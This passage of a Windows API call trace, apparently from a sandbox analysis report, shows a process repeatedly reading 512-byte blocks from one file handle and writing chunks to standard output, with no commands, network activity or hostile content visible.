(_FileHandle=1) returned 0x50 [0212.818] GetFileType (hFile=0x50) returned 0x1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] GetFileType (hFile=0x50) returned 0x1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.818] GetFileType (hFile=0x50) returned 0x1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.819] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.819] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.819] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.819] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] GetFileType (hFile=0x50) returned 0x1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] GetFileType (hFile=0x50) returned 0x1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] GetFileType (hFile=0x50) returned 0x1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] GetFileType (hFile=0x50) returned 0x1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] GetFileType (hFile=0x50) returned 0x1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] GetFileType (hFile=0x50) returned 0x1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] GetFileType (hFile=0x50) returned 0x1 [0212.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.819] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] GetFileType (hFile=0x50) returned 0x1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.820] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.820] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.820] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.820] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] GetFileType (hFile=0x50) returned 0x1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] GetFileType (hFile=0x50) returned 0x1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] GetFileType (hFile=0x50) returned 0x1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] GetFileType (hFile=0x50) returned 0x1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] GetFileType (hFile=0x50) returned 0x1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] GetFileType (hFile=0x50) returned 0x1 [0212.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.820] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] GetFileType (hFile=0x50) returned 0x1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] GetFileType (hFile=0x50) returned 0x1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.821] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.821] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] GetFileType (hFile=0x50) returned 0x1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] GetFileType (hFile=0x50) returned 0x1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] GetFileType (hFile=0x50) returned 0x1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] GetFileType (hFile=0x50) returned 0x1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] GetFileType (hFile=0x50) returned 0x1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.821] GetFileType (hFile=0x50) returned 0x1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] GetFileType (hFile=0x50) returned 0x1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] GetFileType (hFile=0x50) returned 0x1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.822] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.822] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.822] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.822] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] GetFileType (hFile=0x50) returned 0x1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] GetFileType (hFile=0x50) returned 0x1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] GetFileType (hFile=0x50) returned 0x1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] GetFileType (hFile=0x50) returned 0x1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] GetFileType (hFile=0x50) returned 0x1 [0212.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.822] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.823] GetFileType (hFile=0x50) returned 0x1 [0212.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.823] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.823] GetFileType (hFile=0x50) returned 0x1 [0212.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.823] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.823] GetFileType (hFile=0x50) returned 0x1 [0212.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.823] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.823] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.823] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.823] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.823] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.823] GetFileType (hFile=0x50) returned 0x1 [0212.823] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.824] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.824] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.824] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.824] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.824] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.824] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.824] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.824] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.825] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.825] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.825] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.825] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.825] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.825] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.827] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.827] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.827] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.827] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.827] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.827] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.827] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.827] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, 